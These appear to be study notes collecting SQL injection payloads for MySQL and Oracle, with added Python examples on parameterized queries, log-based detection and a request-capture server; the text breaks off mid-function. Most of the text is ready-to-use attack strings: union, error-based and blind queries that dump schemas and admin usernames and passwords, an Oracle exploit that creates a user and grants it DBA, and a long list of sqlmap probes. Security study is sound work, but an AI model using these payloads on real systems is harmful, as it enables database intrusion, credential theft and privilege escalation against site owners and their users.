1. Collect the various payloads used for SQL injection found across the web and understand the environment each applies to (detecting injection vs. exploiting injection)
Collected as follows:
Integer injection: detection
Enter and 1=1 and then and 1=2 and check whether the page changes (no change means this is not an integer injection point)
and 1=1:
and 1=2:
String injection: detection
Enter ' and 1=1%23 and then ' and 1=2%23 and check whether the page changes (a change means a string injection point exists)
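To see why the true/false pair separates the two contexts, and what the fix looks like on the application side, here is an added example that is not from the original notes or from the referenced articles. It uses Python's built-in sqlite3 with a constructed users table; the table and function names are my own. It runs the integer-context pair (and 1=1 / and 1=2) and the string-context pair (' and 1=1-- / ' and 1=2--) against a query built by string concatenation and against a parameterized one:

```python
import sqlite3
from typing import Callable, List, Tuple

Rows = List[Tuple]


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the page's ?id= / ?username= endpoints."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, email) VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test"), (3, "carol", "carol@example.test")],
    )
    return conn


# --- vulnerable forms: the raw value is spliced into the SQL text ---------------------------
def by_id_concat(conn: sqlite3.Connection, value: str) -> Rows:
    # integer context: no quote needed, so `1 and 1=1` lands directly in the WHERE clause
    return conn.execute(f"SELECT id, username FROM users WHERE id = {value}").fetchall()


def by_name_concat(conn: sqlite3.Connection, value: str) -> Rows:
    # string context: the payload must first close the opening quote (hence `' and 1=1--`)
    return conn.execute(f"SELECT id, username FROM users WHERE username = '{value}'").fetchall()


# --- hardened forms: the value travels as a bound parameter, never as SQL text --------------
def by_id_param(conn: sqlite3.Connection, value: str) -> Rows:
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (value,)).fetchall()


def by_name_param(conn: sqlite3.Connection, value: str) -> Rows:
    return conn.execute("SELECT id, username FROM users WHERE username = ?", (value,)).fetchall()


def page_changes(lookup: Callable, conn: sqlite3.Connection, base: str,
                 true_suffix: str, false_suffix: str) -> bool:
    """The notes' 'does the page change?' check: compare the result for an always-true
    condition with the result for an always-false one. A difference means the suffix
    reached the SQL engine as syntax; an SQL error counts as 'no usable difference'."""
    try:
        return lookup(conn, base + true_suffix) != lookup(conn, base + false_suffix)
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    db = make_db()
    print("integer, concatenated :", page_changes(by_id_concat, db, "1", " and 1=1", " and 1=2"))
    print("string,  concatenated :", page_changes(by_name_concat, db, "alice", "' and 1=1--", "' and 1=2--"))
    print("integer, parameterized:", page_changes(by_id_param, db, "1", " and 1=1", " and 1=2"))
    print("string,  parameterized:", page_changes(by_name_param, db, "alice", "' and 1=1--", "' and 1=2--"))
```

With concatenation the pair returns different row sets in both contexts; with bound parameters the whole input is compared as one literal, so the pair never differs while a legitimate value such as "1" still finds its row. That is why parameterization, rather than filtering for strings like and 1=1, is what closes the injection point.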
Union (echo-based) injection: exploitation
MySQL:
Determine the number of columns: ?id=1' ORDER BY 3--+
Determine the displayed positions: ?id=-1' UNION SELECT 1,2,3--+
Explanation: UNION merges the result sets of two or more SELECT statements.
Use functions to obtain information: ?id=-1 UNION SELECT 1,(version()),3--+
Oracle (reference: https://www.jianshu.com/p/af12401bbfd9):
Determine the number of columns:
' order by 3 --
Determine the displayed positions:
' union select null,null,null from dual --
Explanation: dual is a single-row, single-column virtual table that any user can read; it is commonly used in SELECT statements that have no target table.
Get the database version:
' union select null,(select banner from sys.v_$version where rownum=1),null from dual --
Explanation: returns the first row of the version information
Get table names:
' union select null,(select table_name from user_tables where rownum=1),null from dual --
' union select null,(select table_name from user_tables where rownum=1 and table_name<>'T_USER'),null from dual --
Get the column names of the key table:
' union select null,(select column_name from user_tab_columns where table_name='T_USER' and rownum=1),null from dual --
' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and rownum=1),null from dual --
' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and column_name<>'SPWD' and rownum=1),null from dual --
' union select null,(select column_name from user_tab_columns where table_name='T_USER' and column_name<>'SUSER' and column_name<>'SPWD' and column_name<>'SNAME' and rownum=1),null from dual --
Get the data in the key columns:
' union select SNAME,SUSER,SPWD from T_USER --
Privilege escalation to DBA (https://www.cnblogs.com/charie/articles/1240379.html):
select banner from sys.v_$version where rownum=1 and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER ORACLE IDENTIFIED BY fuckadmin'''';END;'';END;--','SYS',0,'1',0)=''--
Explanation: the DBMS_EXPORT_EXTENSION package allows PL/SQL injection; the statement above creates the user and the one below grants it DBA:
select banner from sys.v_$version where rownum=1 and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''GRANT DBA,CONNECT TO ORACLE'''';END;'';END;--','SYS',0,'1',0)=''--
Error-based injection:
MySQL
——————————————————————————————————
(reference: https://blog.csdn.net/jpygx123/article/details/84191704):
Database version:
' and (select 1 from (select count(*),concat((select version()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
Explanation:
concat(): concatenates strings
floor(): rounds down
information_schema: the information database that ships with MySQL; it stores database metadata such as database and table names.
group by: groups the results by one or more columns
limit: restricts the SELECT statement to the given number of rows
Connected user:
+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Explanation:
0x7e: the ASCII character ~
Current database:
' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
Dump databases:
+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Explanation:
distinct: returns only distinct values
Dump tables:
+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Dump columns:
+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Explanation:
0x61646D696E: admin
Dump contents:
+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
For a detailed explanation see https://yq.aliyun.com/articles/692723
ExtractValue error-based injection (the function extracts values from an XML string using XPath notation; if the XPath syntax is malformed it raises an error):
+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
UpdateXml error-based injection (the function returns the replaced XML fragment; when the XPath syntax is wrong it raises an error whose message contains the faulty path):
+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
Exp error-based injection (exp() raises an overflow error when passed a value greater than 709):
and exp(~(select * from(select user())a))
Oracle
——————————————————————————————————
(reference: https://www.jianshu.com/p/af12401bbfd9):
Error-based injection using utl_inaddr.get_host_name():
' and 1=utl_inaddr.get_host_name((select user from dual))--
Explanation:
utl_inaddr is used to obtain host names and IP addresses on the LAN or the Internet
Error-based injection using ctxsys.drithsx.sn():
' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
Explanation:
CTXSYS is the interMedia Text user and holds the CONNECT, RESOURCE and DBA roles
Error-based injection using XMLType():
' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--
Error-based injection using dbms_xdb_version.checkin():
' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
Error-based injection using dbms_xdb_version.makeversioned():
' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null--
Error-based injection using dbms_xdb_version.uncheckout():
' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
Error-based injection using dbms_utility.sqlid_to_sqlhash():
' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null--
Error-based injection using ordsys.ord_dicom.getmappingxpath():
' and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--
' and 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Error-based injection using decode. This method is closer to boolean-based injection, because it does not echo the query result through the error message; it only serves as a way to tell different page behaviours apart:
' and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --
Blind injection:
MySQL
——————————————————————————————————
Time-based blind payloads (reference:
https://maplege.github.io/2017/09/16/sleepBlandSQLInjection/):
Find a working injection form
?id=1' and sleep(5) --+   injection attempt: if the page returns after sleeping 5 seconds, this form is usable and the SQL statement took effect
?username=admin' and if(1=2,1,sleep(10))#
Determine the database name
?id=1' and if((select length(database())>7)>0,sleep(5),null) --+   checks whether the database name is longer than 7
?id=1' and if((select ascii(substr(database(),1,1))>97)>0,sleep(5),null) --+   checks whether the ASCII value of the first character of the database name is greater than 97
?id=1' and if((select database())="security",sleep(5),null) --+   checks whether the database name is security: sleeps 5 seconds if so, otherwise returns immediately
Determine the version
?id=1' and if((select version()) like "10%",sleep(5),null) --+   checks whether the version starts with 10 (usually 5); sleeps 5 seconds if so
Determine table names
?id=1' and if ((select length(table_name)>4 from information_schema.tables limit 2,1)>0,sleep(5),null); --+   checks whether the name of the third table is longer than 4
?id=1' and if ((select substr(table_name,1,1) from information_schema.tables limit 2,1)='u',sleep(5),null); --+   checks whether the first letter of the third table's name is u
Determine column names
?id=1' and if ((select length(column_name)>1 from information_schema.columns where table_schema=database() and table_name="users" limit 0,1)>0,sleep(5),null); --+   checks whether the first column name of the users table is longer than 1
?id=1' and if((select ascii(substr(column_name,1,1))>97 from information_schema.columns where table_schema=database() and table_name="users" limit 0,1)>0,sleep(3),null)--+   checks whether the ASCII value of the first character of the first column name of the users table is greater than 97
Get the data
?id=1' and if((select length(username)>1 from users limit 0,1)>0,sleep(3),null)--+   checks whether the first row of the username column is longer than 1
?id=1' and if((select ascii(substr(username,1,1))>65 from users limit 0,1)>0,sleep(3),null)--+   checks whether the ASCII value of the first character of the first username is greater than 65
(reference:
http://www.admintony.com/MYSQL%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8%E6%80%BB%E7%BB%93.html)
Detect injection:
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
Read the user name
payload: if(ascii(substr(user(),<position>,1))=114,sleep(3),1)
Read the database name
payload: if(ascii(substr(database(),1,1))=114,sleep(5),1)
Read the MySQL version
payload: if(ascii(substr(version(),1,1))=114,sleep(5),1)
Dump tables
union select if(ascii(substr(table_name,1,1))>97,sleep(5),1),2,3 from information_schema.tables where table_schema = database() limit 0,1
union select if(ascii(substr(user(),1,1))=114,sleep(5),1),2,3
Dump column names
union select if(ascii(substr(column_name,1,1))=105,sleep(5),1),2,3 from information_schema.columns where table_name = 'admin' limit 0,1
Dump data
union select if(ascii(substr(user,1,1))=97,sleep(5),1),2,3 from admin limit 0,1
Boolean-based blind payloads (reference:
https://maplege.github.io/2017/08/26/boolBlandSQLInjection/)
# check the length of the current database name
?id=12' and (select length(database())>5) --+
# check the current database name
?id=12' and (select ascii(substr(database(),1,1))>=97) --+
# check the length of the first table name
?id=12' and (select length(table_name)>5 from information_schema.tables where table_schema=database() limit 0,1) --+
# check the second table name
?id=12' and (select ascii(substr(table_name,1,1))>97 from information_schema.tables where table_schema=database() limit 1,1) --+
# check the length of the first column name of the users table
?id=12' and (select length(column_name)>1 from information_schema.columns where table_schema=database() and table_name='users' limit 0,1) --+
# check the first column name of the users table
?id=12' and (select ascii(substr(column_name,1,1))>65 from information_schema.columns where table_schema=database() and table_name='users' limit 0,1) --+
# check the length of the first row of the username column
?id=12' and (select length(username)>1 from users limit 0,1) --+
# check the first row of the username column
?id=12' and (select ascii(substr(username,1,1))>=65 from users limit 0,1) --+
Oracle
Reference: https://www.jianshu.com/p/af12401bbfd9
Boolean blind injection with the decode function: substr(user,1,1) is the condition and 'S' is the value being tried for that position; if it matches, the mapped value 1 is returned, otherwise the default value 0
http://10.10.10.110:8080/SqlInjection/selcet?suser=1&sname=1'and 1=(select decode(substr(user,1,1),'S',(1),0) from dual) --
Boolean blind injection with instr: (select user from dual) is the query result, and instr returns the position of 'SQL' within that result, or 0 if it is not found; by iterating over the candidate substring 'SQL' the data can be recovered. This is similar to the MySQL regexp injection method.
http://10.10.10.110:8080/SqlInjection/selcet?suser=1&sname=1'and 1=(instr((select user from dual),'SQL')) --
2. Record the payloads sqlmap uses during detection and exploitation (this is also a way of collecting payloads)
Collected as follows:
)))’(")(()
.)"()).’,.
) AND 7447=7554—tMuJ
) AND 6343=6343—EsNa
’ AND 2449=2846—sUQj
’ AND 6343=6343—keJl
) AND 6343=6343 AND (7799=7799
) AND 6443=6343 AND (7799=7799
)) AND 9007=3471 AND ((7116=7116
)) AND 6343=6343 AND ((3202=3202
))) AND 6898=5624 AND (((1942=1942
))) AND 6343=6343 AND (((6838=6838
AND 6161=4494
AND 6343=6343
') AND 6343=6343 AND (‘iCym’=‘iCym
‘)) AND 3090=4959 AND ((‘lyJJ’=‘lyJJ
‘)) AND 5640=5640 AND ((‘LNeu’=‘LNeu
‘))) AND 1863=3401 AND (((‘mqtW’=‘mqtW
‘))) AND 5640=5640 AND (((‘yADD’=‘yADD
’ AND 5460=1068 AND ‘xQig’=‘xQig
") AND 8888=6425 AND (“gTmI” LIKE "gTmI
") AND 6343=6343 AND (“yBfl” LIKE "yBfl
" AND 5350=8435 AND “MzPm” LIKE "MzPm
" AND 6343=6343 AND “XPgX” LIKE "XPgX
%’) AND 7025=6144 AND (’%’=’
%’) AND 6343=6343 AND (’%’=’
") AND 8009=3368 AND (“YKVn”=“YKVn
%” AND 3836=3836—uOPt
%’) AND 6680=6680#
%’)) AND 6583=3749#
) RLIKE (SELECT (CASE WHEN (9597=7918) THEN 1 ELSE 0x28 END))—UosQ
)) RLIKE (SELECT (CASE WHEN (9062=5433) THEN 1 ELSE 0x28 END)) AND ((1878=1878
) AND MAKE_SET(6916=7532,7532)—TrWw
) AND (SELECT (CASE WHEN (9507=5382) THEN NULL ELSE CAST((CHR(99)||CHR(68)||CHR(119)||CHR(114)) AS NUMERIC) END)) IS NULL—MNJe
) AND (SELECT (CASE WHEN (1972=1972) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1972) END) FROM DUAL) IS NULL—UlcH
(SELECT (CASE WHEN (6130=7365) THEN 6130 ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (3636=3636) THEN 1 ELSE 3636*(SELECT 3636 FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN (3805=8869) THEN 1 ELSE 3805*(SELECT 3805 FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN (1059=6489) THEN 0x74657374 ELSE 1059*(SELECT 1059 FROM INFORMATION_SCHEMA.PLUGINS) END))
',(SELECT (CASE WHEN (4165=4165) THEN 0x74657374 ELSE 4165*(SELECT 4165 FROM INFORMATION_SCHEMA.PLUGINS) END))—Gclh
(CASE WHEN 2693=2693 THEN ‘test’ ELSE NULL END) test是该处字段的值
(CASE WHEN 2294=9587 THEN ‘test’ ELSE NULL END) 同上
(CASE WHEN 2361=2361 THEN 2361 ELSE NULL END)
(CASE WHEN 4605=9403 THEN 4605 ELSE NULL END)
(CASE WHEN (2476=2476) THEN ‘test’ ELSE 2476*(SELECT 2476 FROM DUAL UNION SELECT 9552 FROM DUAL) END)
(CASE WHEN (3224=9430) THEN ‘test’ ELSE 3224*(SELECT 3224 FROM DUAL UNION SELECT 9430 FROM DUAL) END)
(CASE WHEN (9315=9315) THEN 9315 ELSE 9315*(SELECT 9315 FROM DUAL UNION SELECT 9208 FROM DUAL) END)
IIF(9481=9481,9481,1/0)
IIF(1125=8808,1125,1/0)
(SELECT (CASE WHEN (9081=9081) THEN 9081 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN (9198=9198) THEN 9198 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (1471=1471) THEN 1471 ELSE 1471*(SELECT 1471 UNION ALL SELECT 9858) END))
(SELECT (CASE WHEN (6493=7523) THEN 6493 ELSE 6493*(SELECT 6493 UNION ALL SELECT 7523) END))
);IF(6378=8135) SELECT 6378 ELSE DROP FUNCTION Szmn—
) AND (SELECT 7068 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7068=7068,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)—ozhS
) AND EXTRACTVALUE(9024,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(9024=9024,1))),0x7170707671))—QRwG
) AND UPDATEXML(1127,CONCAT(0x2e,0x71626a6b71,(SELECT (ELT(1127=1127,1))),0x7170707671),4495) AND (8401=8401
) AND ROW(2651,6055)>(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(2651=2651,1))),0x7170707671,FLOOR(RAND(0)2))x FROM (SELECT 5557 UNION SELECT 6082 UNION SELECT 5642 UNION SELECT 7878)a GROUP BY x)—SaxV
) AND 7443=CAST((CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (7443=7443) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)) AS NUMERIC)—YMDR
) AND 3570 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3570=3570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (7075=7075
'))) AND 3570 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3570=3570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (((‘xbVj’='xbVj
) AND 1426=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1426=1426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (9532=9532
) AND 2168=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2168=2168) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)—ghfH
) AND 6865=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6865=6865) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)) AND (4852=4852
)) AND 3058=CTXSYS.DRITHSX.SN(3058,(CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (3058=3058) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND ((2596=2596
) AND 9306=(‘qbjkq’||(SELECT CASE 9306 WHEN 9306 THEN 1 ELSE 0 END FROM RDB$DATABASE)||‘qppvq’) AND (8378=8378
) PROCEDURE ANALYSE(EXTRACTVALUE(3047,CONCAT(0x5c,0x71626a6b71,(SELECT (CASE WHEN (3047=3047) THEN 1 ELSE 0 END)),0x7170707671)),1)—dmiu
(SELECT 1803 FROM(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(1803=1803,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
(EXTRACTVALUE(9989,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(9989=9989,1))),0x7170707671)))
',(SELECT 9804 FROM(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(9804=9804,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)—Pken
',(SELECT 8906 FROM (SELECT ROW(8906,7318)>(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(8906=8906,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM (SELECT 7404 UNION SELECT 7246 UNION SELECT 9305 UNION SELECT 8758)a GROUP BY x))s)—OvoP
)));SELECT SLEEP(5)#
);(SELECT * FROM (SELECT(SLEEP(5)))IQnm)#
)));SELECT PG_SLEEP(5)—
);CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS ‘/lib/libc.so.6’,‘sleep’ language ‘C’ STRICT; SELECT sleep(5)—
));WAITFOR DELAY ‘0:0:5’—
);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(105)||CHR(111)||CHR(97),5) FROM DUAL—
’ AND ELT(2169=2169,SLEEP(5))—VOSq
) AND 1377=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(72)||CHR(103)||CHR(86),5)—Aojg
BEGIN IF (5532=5532) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
) ORDER BY 1—IFWK
) UNION ALL SELECT NULL,NULL,NULL,NULL—HaXG
-5362 UNION ALL SELECT 2771,2771,2771,2771,2771,2771,2771,2771,2771#
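The recurring shapes in the list above (the random four-letter comment suffix such as -- tMuJ, the q...q boundary markers 0x71626a6b71 / 0x7170707671, the SLEEP/PG_SLEEP/WAITFOR DELAY/DBMS_PIPE calls, EXTRACTVALUE/UPDATEXML, FLOOR(RAND(0)*2), UNION ALL SELECT) are what a defender can look for in web access logs. The following is an added example that is not part of the original notes or of sqlmap: a small Python log scanner run over constructed Apache-style lines. The signature families and regular expressions are my own heuristics derived from the payload shapes above; the IP addresses, paths and timestamps are made up.

```python
import re
import urllib.parse
from typing import List, Tuple

# Heuristic signature families (case-insensitive), derived from the payload shapes listed above.
SIGNATURES = [
    ("time-based",
     re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|WAITFOR\s+DELAY|DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP", re.I)),
    ("error-based",
     re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(|FLOOR\s*\(\s*RAND\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"
                r"|UTL_INADDR\.|CTXSYS\.DRITHSX\.SN|DBMS_XDB_VERSION\.", re.I)),
    ("union-based",
     re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b|\bORDER\s+BY\s+\d+", re.I)),
    ("boolean-based",
     re.compile(r"\bAND\s+\d{4}\s*=\s*\d{4}\b|\b(?:AND|OR)\s+1\s*=\s*[12]\b", re.I)),
]
# sqlmap fingerprints: the trailing "-- XXXX" comment and the 'q???q' hex boundary markers.
SQLMAP_TAIL = re.compile(r"--\s*[A-Za-z]{4}$")
SQLMAP_MARK = re.compile(r"0x71[0-9a-f]{6}71\b", re.I)

# Pulls method and request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries; none of them come from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%27%20AND%20SLEEP(5)--%20VOSq HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27%20AND%20EXTRACTVALUE(9024,CONCAT(0x5c,0x71626a6b71,'
    '(SELECT%20(ELT(9024=9024,1))),0x7170707671))--%20QRwG HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=-5362%20UNION%20ALL%20SELECT%202771,2771,2771%23 HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%29%20AND%206343=6343%20AND%20%287799=7799 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 900',
]


def decode_target(target: str) -> str:
    """Percent-decode only the query string, so the payload reads as the database would see it."""
    path, _, query = target.partition("?")
    return path + ("?" + urllib.parse.unquote_plus(query) if query else "")


def classify(decoded: str) -> List[str]:
    """Return the signature families a decoded request target matches, in SIGNATURES order."""
    hits = [name for name, pattern in SIGNATURES if pattern.search(decoded)]
    if SQLMAP_TAIL.search(decoded) or SQLMAP_MARK.search(decoded):
        hits.append("sqlmap-fingerprint")
    return hits


def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Yield (line number, decoded target, families) for every line that matches at least one family."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        decoded = decode_target(match.group("target"))
        hits = classify(decoded)
        if hits:
            findings.append((number, decoded, hits))
    return findings


if __name__ == "__main__":
    for number, decoded, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}\n    {decoded}")
```

The ORDER BY \d+ and AND nnnn=nnnn patterns will also fire on some legitimate traffic, so the output is a triage queue rather than a verdict; one client producing several different families within a few seconds, as a scanner does, is the stronger signal. Decoding the query before matching matters because scanners send the payloads percent-encoded, as in the sample lines.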
3. Understand the meaning of the SQL statements involved above; they cover different databases and different injection scenarios. The learning process and the collection methods can be written up as a report; understanding the payloads draws on the fundamentals studied earlier.
Extended study: understand how sqlmap's built-in tampers work. They usually rely on database-specific features to transform payloads so as to bypass simple security checks.
Related notes
1. This study is still centred on databases, with two focuses:
First, information gathering over the web: collect as many publicly available SQL injection payloads as possible. Sources can be articles, tools on GitHub, and finished products that bundle their own payloads (for example sqlmap).
Second, understanding the difficult points of database usage that these payloads involve, for example the role certain special characters play in the database, how the functions studied earlier are applied in real injection, and database functionality and features that earlier study did not cover.
2. After learning these basics you can study how sqlmap's built-in tampers work and how to write a tamper, as extended training; those who are able can dig into it.
3. The focus this time is not on learning sqlmap but still on the database. This task trains information-gathering ability, broadens the ways of collecting information, consolidates the earlier fundamentals and extends them with things not yet covered.
4. Some of the payloads I uploaded also come from fuzz dictionaries bundled with tools on GitHub. The way to study them is not to understand and practise every single payload: fuzzing means trying variations in unknown situations, so there is no need to reason about and simulate the scenario of each payload. The main point is to learn the fundamentals behind them; being able to understand every character, function and statement a payload involves is enough.
5. On how to obtain sqlmap's payloads: it is open-source software, so those with the ability can read the code and extract them, which settles it once and for all. A method that also works for many closed-source products is to deploy a web environment configured to record every access, including GET, POST and HEAD requests, scan it with the scanner, and once the scan finishes pull the logs out and analyse them.
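For point 5, the logging web environment can be as small as the following added Python script (my own, not from the notes). It answers every HTTP method with a fixed 200 response so a scanner keeps going, and keeps each request, with the query string and any form body decoded, as a JSON-serialisable record. The host, port, output file name and function names are assumptions.

```python
import json
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List

# Records are kept in memory here and written out on demand; a deployment would append
# to a file as each request arrives (assumption about how it would be used).
RECORDS: List[Dict] = []


def build_record(method: str, target: str, headers: Dict[str, str], body: bytes) -> Dict:
    """Turn one raw request into a record whose query and form fields are already decoded,
    so the later analysis step sees payloads the way the database would."""
    path, _, query = target.partition("?")
    record = {
        "method": method,
        "path": path,
        "query": urllib.parse.parse_qs(query, keep_blank_values=True),
        "headers": {k.lower(): v for k, v in headers.items()},
        "body_raw": body.decode("utf-8", errors="replace"),
    }
    content_type = record["headers"].get("content-type", "")
    if content_type.startswith("application/x-www-form-urlencoded"):
        record["body_form"] = urllib.parse.parse_qs(record["body_raw"], keep_blank_values=True)
    return record


class CaptureHandler(BaseHTTPRequestHandler):
    def _capture(self) -> None:
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        RECORDS.append(build_record(self.command, self.path, dict(self.headers.items()), body))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(b"ok\n")

    # Scanners try every method; route them all to the same capture routine.
    do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = _capture

    def log_message(self, *args) -> None:
        pass  # keep stdout quiet; the JSONL file is the record of interest


def dump_records(path: str) -> int:
    """Append every captured record as one JSON line; returns the number written."""
    with open(path, "a", encoding="utf-8") as fh:
        for record in RECORDS:
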